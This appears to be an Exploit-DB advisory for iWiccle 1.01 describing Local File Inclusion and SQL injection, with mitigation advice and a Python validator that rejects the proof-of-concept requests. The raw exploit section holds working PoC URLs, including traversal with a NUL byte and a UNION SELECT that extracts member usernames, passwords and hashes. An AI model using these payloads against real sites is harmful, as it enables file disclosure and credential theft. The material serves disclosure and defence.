Vendor: iWiccle
By: SirGod
CVSS: 8.8 (HIGH)
Type: Local File Inclusion and SQL Injection
CWE: 22, 89
Product Name: iWiccle
Affected Version From: 1.01
Affected Version To: 1.01
Patch Exists: NO
Related CWE: N/A
CPE: a:wiccle:iwiccle
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Published: 2009

iWiccle 1.01 (LFI/SQL) Multiple Remote Vulnerabilities

iWiccle 1.01 is vulnerable to both Local File Inclusion and SQL Injection. An attacker can exploit these vulnerabilities by sending crafted requests to the application. For Local File Inclusion, an attacker can send a crafted request to the application with a malicious file path in the ‘module’ parameter. For SQL Injection, an attacker can send a crafted request to the application with a malicious SQL query in the ‘member_id’ parameter.

Mitigation:

To mitigate the Local File Inclusion vulnerability, the application should validate user input and restrict access to the application to trusted users. To mitigate the SQL Injection vulnerability, the application should use parameterized queries and input validation.
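As an added example (not part of the advisory or of the iWiccle code), the Python check below applies the mitigation described above to the advisory's own PoC requests: module and show values are checked against an assumed allowlist and rejected on NUL bytes or traversal sequences, and member_id must be a plain integer before it can reach a query. The allowlists and the '/iwiccle/' install path are assumptions.

```python
# Added example (not iWiccle's code): request-side validation for the
# parameters the advisory names. Allowlists are assumptions about what a
# deployment ships; adjust them to the modules actually installed.
import re
from urllib.parse import parse_qs, urlsplit

ALLOWED_MODULES = {"wiccle", "admin"}          # assumed allowlist for 'module'
ALLOWED_VIEWS = {"download", "users"}          # assumed allowlist for 'show'
MEMBER_ID_RE = re.compile(r"^[0-9]{1,10}$")    # member_id is an integer key
NAME_RE = re.compile(r"^[A-Za-z0-9_]+$")       # safe module/view token

def _check_name(value, allowed):
    """Reason a module/show value is unsafe, or None if it is acceptable."""
    if "\x00" in value:
        return "embedded NUL byte (include() path truncation)"
    if "/" in value or "\\" in value or ".." in value:
        return "path traversal characters"
    if not NAME_RE.fullmatch(value):
        return "characters outside [A-Za-z0-9_]"
    if value not in allowed:
        return "not in the module allowlist"
    return None

def check_request(url):
    """Return {param: reason} for every rejected parameter in one request URL.
    An empty dict means the request passes validation."""
    # parse_qs percent-decodes, so %00 becomes '\x00' and '+' becomes ' '.
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    rejected = {}
    for name, allowed in (("module", ALLOWED_MODULES), ("show", ALLOWED_VIEWS)):
        for value in params.get(name, []):
            reason = _check_name(value, allowed)
            if reason:
                rejected[name] = reason
    for value in params.get("member_id", []):
        if not MEMBER_ID_RE.fullmatch(value):
            rejected["member_id"] = "not a plain integer (use a bound parameter)"
    return rejected

# Constructed sample requests: the advisory's PoCs with '/iwiccle/' standing in
# for [path] (SQL PoC shortened to its marker), plus one legitimate request.
SAMPLE_URLS = [
    "http://127.0.0.1/iwiccle/index.php?module=../../../../../../bootsect.bak%00",
    "http://127.0.0.1/iwiccle/index.php?module=admin&show=../../../../../../bootsect.bak%00",
    "http://127.0.0.1/iwiccle/index.php?module=admin&show=users&area=manage_users"
    "&action=edit_user&member_id=null+union+all+select+1,2,3--",
    "http://127.0.0.1/iwiccle/index.php?module=admin&show=users&area=manage_users"
    "&action=edit_user&member_id=1",
]

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        print(check_request(url) or "accepted", "<-", url)
```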

Exploit-DB raw data:

###########################################################################################
[+] iWiccle 1.01 (LFI/SQL) Multiple Remote Vulnerabilities
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
############################################################################################

[+] Download : http://www.wiccle.com/index.php?module=wiccle&show=download

[+] Local File Inclusion

 - PoC's

     http://127.0.0.1/[path]/index.php?module=../../../../../../bootsect.bak%00

     http://127.0.0.1/[path]/index.php?module=admin&show=../../../../../../bootsect.bak%00


[+] SQL Injection

 - PoC

   http://127.0.0.1/[path]/index.php?module=admin&show=users&area=manage_users&action=edit_user&member_id=null+union+all+select+1,2,3,4,concat_ws(0x3a,member_username,member_password,member_hash),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+w_members+where+member_id=1--

############################################################################################

# milw0rm.com [2009-07-27]